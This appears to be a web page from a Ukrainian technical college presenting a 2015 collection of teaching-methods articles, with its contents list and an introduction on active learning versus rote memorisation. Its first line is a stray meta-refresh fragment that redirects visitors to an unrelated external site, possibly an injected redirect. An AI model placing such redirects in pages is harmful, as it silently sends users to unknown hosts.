http-equiv="Refresh" content="5; URL=http://www.t55555.at.ua"

МЕТОДИЧНА РОБОТА - скачати   PDF

Затверджено до публікації:

методичною радою ТК ДДАЕУ

протокол №9 від 14.04.2015 року

Відповідальна за випуск: Рівна С.А., методист ТК ДДАЕУ

 

Актуальні питання навчально-виховного процесу: теорія і практика. Методичний збірник. – Дніпропетровськ: 2015. – Матеріали публікуються в авторській редакції.

 У збірнику представленні статті та тези доповідей викладачів ТК ДДАЕУ з актуальних питань навчально-виховної роботи у коледжі. Матеріали можуть бути використані викладачами вищих навчальних закладів І, ІІ рівнів акредитації.

 

ЗМІСТ

ВСТУП  …………………………………………………………………………      4

РОЗДІЛ 1. Компетентнісний підхід в організації освітнього процесу

 

 Рівна С.А.

 Професійна діяльність та педагогічна  майстерність викладача …………..       6

 

Ткаченко В.О.

Проблеми розробки сучасних програмних засобів ІКТ ……………………..     12     

РОЗДІЛ 2. Інформаційні технології в освіті

Лебеденко Т.Ю.

Впроваджуємо інформаційні технології у навчальний процес……………….   16 

Остропольська М.В.

Інформаційні технології у вищій освіті. «Розумна дошка» …………………..    21

Гаврюшина В. В.      

Використання інформаційних технологій у навчанні іноземної мови ……….   26

Рівна С.А.

Віртуальна лабораторія  як засіб інформаційних технологій …………………  32

РОЗДІЛ 3. Інтерактивні технології навчання у вищій школі

 

Бабич Н.О.

Інтерактивні технології навчання ……………………………………………….  37

Дружко А.К.

Використання інтерактивних технологій у викладанні біології……………..     43

Безбородько М.В.

Використання інформаційних технологій у процесі  навчання для

економічного напряму підготовки……………………………………………       47

ВСТУП

Наша праця – формування людини, і це покладає на нас особливу, ні з чим не зрівняну відповідальність.                          

                                      В. О. Сухомлинський

Закон України «Про Вищу освіту» визначає освітній процес - як інтелектуальну, творчу діяльність у сфері вищої освіти і науки, що провадиться у вищому навчальному закладі через систему науково-методичних і педагогічних заходів та спрямовану на передачу, засвоєння, примноження і використання знань, умінь та інших компетентностей у осіб, які навчаються, а також на формування гармонійно розвиненої особистості.

Складність освітнього процесу полягає у тому, що він, займаючи значне місце у житті людини, не дає відчутного, зримого і конкретного результату відразу по завершенню. Результатом освіти являється поведінка, діяльність, спосіб життя людини у її майбутньому. Кожний хто вибирає професію педагога, бере на себе відповідальність за тих кого він буде вчити і виховувати.

Існує цілий ряд невирішених або недостатньо вирішених проблем, які актуальні для професійної діяльності викладача. Розглянемо деякі з них.      

Часто викладачі скаржаться на низьку активність студентів, тобто недостатню інтенсивність і ефективність їх навчальної діяльності. Завдання організації такої діяльності - це завдання педагога, і воно набагато складніше, ніж просто "передача" знань. Мало того, що викладач сам працює на занятті, не менш продуктивно повинні працювати і студенти. Прагнути потрібно не епізодичної активності навчання на деяких заняттях і з деяких дисциплін (предметів), а створення цілісної системи навчання, системи всіх методик, при яких студент не зможе бути неактивним в принципі.

Існуючий пояснювально-ілюстративний характер навчання фактично виключає з роботи студентів їх мислення (студенти "розучуються думати") та перебільшує роль сприйняття і спостереження. У коледжі потрібно, звичайно ж, пояснювати і ілюструвати, але все це повинно бути підпорядковане одній меті: розумінню і засвоєнню студентами змісту дисциплін і предметів, що вивчаються, а не спрощеному викладу і барвистому опису. А.Дістервег, у свій час, зазначав, що поганий учитель подає істину, гарний – вчить її знаходити. 

Відсутність творчості, пошуку в роботі студентів приводить до переважного завантаження пам'яті, а не мислення. Студент, звичайно ж, може зазубрити матеріал, а потім здати його, повторивши все заучене слово в слово, але після такого навчання у людини може нічого не залишитися. Такі знання неміцні, недовговічні, їх не можна застосувати на практиці. У майбутній професійній діяльності методи заучування і точного відтворення інформації з пам'яті ("зубріння") не потрібні. Студент залишається не підготовленим до тих форм роботи, які зустрінуться у його професійній діяльності - вміння знаходити потрібну інформацію для прийняття виробничого рішення, вміння знаходити самостійне творче рішення у складних ситуаціях.

Таким чином, при традиційному навчанні спостерігається розрив між тими вимогами, які пред'являються до людини в процесі навчання, і тими, які пред'являються у реальній професійній діяльності. Тому навчання слід орієнтувати на роботу мислення студентів. Тоді і запам'ятовування буде здійснюватися мимоволі і міцно, а збереження переробленого матеріалу - багато надійніше, і відтворення його - більш упевнене, зорієнтоване на практику. У цьому випадку навчання буде носити дійсно розвиваючий характер, тобто формувати прийоми і способи діяльності та тип мислення, вести до засвоєння знань і, нарешті, до зміни внутрішнього світу студента.

  ......................... 

              ПОВНА ВЕРСІЯ  -  МЕТОДИЧНА РОБОТА - скачати   PDF